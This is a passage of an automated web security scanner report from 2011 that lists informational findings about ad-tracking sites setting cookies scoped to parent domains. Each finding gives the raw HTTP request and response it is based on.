GET /js_1_0/?config=3514931570&type=sports&keywordCharEnc=utf8&source=npc_lee_southernillinoisian_t1_ctxt&adwd=300&adht=250&ctxtUrl=http%3A%2F%2Fwww.thesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html&bg=FFFFFF&bc=FFFFFF&cc=FFFFFF&lc=254264&tc=333333&uc=999999&du=1&cb=1307962881243&ctxtContent=%3Chead%3E%0A%3Cbase%20href%3D%22http%3A%2F%2Fthesouthern.com%2Fcontent%2Ftncms%2Flive%2F%22%3E%0A%0A%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%3E%0A%3Cmeta%20name%3D%22description%22%20content%3D%22%22%3E%0A%3Cmeta%20name%3D%22keywords%22%20content%3D%22%23ap%2C%22%3E%0A%0A%3Cmeta%20property%3D%22og%3Atitle%22%20content%3D%22Mavs%20show%20their%20depth%2C%20teamwork%20in%20title%20clincher%20%20%22%3E%0A%3Cmeta%20property%3D%22og%3Asite_name%22%20content%3D%22thesouthern.com%22%3E%0A%0A%0A%0A%3Cmeta%20property%3D%22og%3Aimage%22%20content%3D%22http%3A%2F%2Fbloximages.chicago2.vip.townnews.com%2Fthesouthern.com%2Fcontent%2Ftncms%2Fassets%2Feditorial%2Fc%2Fbd%2F011%2Fcbd0112 HTTP/1.1
Host: cm.npc-lee.overture.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=392qmnl6tfcas&b=3&s=n2; UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDYwNXMyMjc0cAC51V7gw=

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:01:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCydLI2cAAxJW/Qw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 10-Jun-2021 11:01:23 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4740

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

12.64. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/44/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3598886902647137246

Response

12.65. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3598886902647137246

Response

12.66. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 10-Dec-2011 11:02:21 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3598886902647137246

Response

12.67. http://d.chango.com/collector/admeldpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.chango.com
Path:	/collector/admeldpixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:21:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /collector/admeldpixel?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=333&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.chango.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59006706.1305747445.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59006706.1028050991.1305747445.1305747445.1305747445.1; _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4

Response

HTTP/1.1 200 OK
Content-Length: 127
Server: Chango RTB Server
Etag: "221317d909a8182ab0ef09e8645ebe593b9165d9"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 10 Jun 2021 11:21:55 GMT; Path=/
Set-Cookie: _i_admeld=1; Domain=chango.com; expires=Mon, 20 Jun 2011 11:21:55 GMT; Path=/
Connection: close

(new Image()).src='http://tag.admeld.com/match?admeld_adprovider_id=333&external_user_id=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4';

12.68. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dm/mkt/3/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2614175914018475511; Domain=.mediabrandsww.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2614175914018475511

Response

12.69. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 10-Dec-2011 11:02:20 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

12.70. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.turn.com
Path:	/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:21 GMT; Path=/
uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 HTTP/1.1
Host: d.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=CuIdyNnNbsd8IFR5CESMwk5_AoqRQoxQlknjNiZmToHG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6Ye8sHu_4bGJr09YnZmqiqYnTG8vXtMcexI5g_6ntO2wVudVjXv710qx_I9zopHzosdGJ7AS1T6b5wiqmkpXpXdnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlIctgzop7L7m_ggs3PS7FLE0J_7oKjjzxbQbmixkRIYsHgcoS23WeHIgf_ApGB4ffykrPnoMmRtmOJTHuT4TLZswcYgCM7hKMCgsWzWU7StbEax1et2JxE0L6wqLjDdN2PjxtpnGLlrQ_v1_iIsNK3YbLvHH5DlZJnRA5TSggml5Vkx5hzJv_ogNmMnEecKQZ9TLZm6WlDbMzjxLwgMw3CMh3l1YEzqVjRPlCzU3sWqfGD3wSmKO4ttba9K0UuGWbDgtU7dib_VO4FYHBtZpXpxtgrDqQSfnHriEQfizDMop5Nlbka3cRHmW8JQbh5rTTYem1Og1flGKbh_GovT30ECBf74GlYyuvK9KnnIK8apm8pSycih6imKgjYngGQOdM2V7ruefAgc2DnSqRyDQHo09zZyCvywlaxJzfgdiIDDEbcEKy81Pxn5UwuWEd2NKdFk_cv5dlDFn-C7tAFxoeY4T7tyHWJjTSDIaJ1V_RMz19-GhRUIjuqdf6tJnR1NsAxe1z9ss6NXEdoBdHz1XXKNDOG1brXgeroIzd4C80BOQ5jllwylPntI0EFsF2fygOKzQfzs6tcbyLYy_I5kqleHXpcp61V_C97XLclj0PfNXbkGgVVrmLrpBl0wPQu0ZWN9PsRCwdrigvWm3hew5vSwfUn8cfIJteWX0KbGv_oMQyUSDxON3ZpXzbrcCtDhr1CrDQNprqT6LTvPSdTOxkAnyY7UhaqUCgmiIsYjYAfluMNhNF6QvDKF3FAvRLyyKgxwPafVsNCGDp8FUznCm_OeYPXW6COfNgsXeriVOqmy6A8g1H80g-BazvB_U5pzrNj2VtuePwYbxARyfSM0IxpDwROKZjbMK9VuySUPZ58x4b-T7KW5NHyxpI3gL4kr15i9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIkeIetYnnl8gEyAgKZsW3xt6Dp_PeiyOD9QEUIwytD75uv-icKe0iPEBilltibzylcftZtsmjbDphE8x5XJBiuHH7WbbJo2w6YRPMeVyQYrhx-1m2yaNsOmETzHlckGK4cDq2CEfDid4wszbuaXE_TN0eUuYzj60ncUd4EVOJsejdHlLmM4-tJ3FHeBFTibHo3R5S5jOPrSdxR3gRU4mx6ITxCe407s0emJ3U9w9WXXkoTRX2fSbc7i_OzYNa_f3daWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; fc=MWp4cE5jbv0XEkz_Ctovfc4qcg9-bn9SwzG9UG7pVfH7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rST9NoqOhx59MhzvvL9oVqmIEEoaWdqdoBsvj70rBbRHxkrMB3cW0HroQP3xwOFfJNfuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response

12.71. http://d.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=dx&ssv_duid=910903057632460979&ssv_dx_1=&ssv_dx_2=&ssv_dx_3=2011051519270862126421219180 HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N2X2MyfFl8MTMwNzA2MDc5N3xzc3ZfMXwyODU0NDU1MDF8MTMwNzA2MDc5N3xzc3ZfYzR8WXwxMzA2NTM0NDg0fA==; 84218-B84223=0|0|0|0|0|66286|110253|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.0 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:16:08 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 90514-B90519=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
Connection: close

12.72. http://d.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/meta

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

84218-B84223=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta?_o=65121&_t=xl&&ssv_duid=910903057632460979 HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.dt/dt2;sz=1x1;ord=1234443?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; C1780853=0@4; M62795-747980=1; M62795-52787=1; M62795-97956=1; P37257=c3N2X2J8YzF8MTMwNjUyNDkyNHxzc3ZfYzF8WXwxMzA2NTI0OTI0fA==; M62795-747979=1; O1807966=4112; P1807966=c3N2X2MyfFl8MTMwNzA2MDc5N3xzc3ZfMXwyODU0NDU1MDF8MTMwNzA2MDc5N3xzc3ZfYzR8WXwxMzA2NTM0NDg0fA==

Response

HTTP/1.0 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:09:10 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: 84218-B84223=0|0|0|0|0|66286|110253|-1; domain=.ru4.com; path=/
Location: http://http.content.ru4.com/images/pixel.gif
Content-length: 0
Connection: close

12.73. http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-407/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1;expires=Wed, 13 Jul 2011 11:06:54 GMT;path=/;domain=.zedo.com;
FFcat=826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=2:2:1:0:0;expires=Tue, 14 Jun 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-407/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=13&d=14&q=&$=&s=1&z=0.0867671319283545 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; __qca=P0-1637156077-1305746709690; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFCap=1595B305,201787|0,13,1; FFgeo=2241452; ZFFAbh=879B826,20|120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
